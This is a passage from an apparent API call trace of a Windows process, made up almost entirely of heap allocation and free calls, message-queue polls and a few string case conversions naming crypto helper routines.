hHeap=0x8a0000) returned 1 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0167.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1828a) returned 0xa48008 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0167.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0167.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0167.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0167.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0167.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0167.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0167.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.899] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0167.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.899] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.900] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0167.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.901] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0167.902] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0167.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0167.903] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0167.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0167.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0167.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0167.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 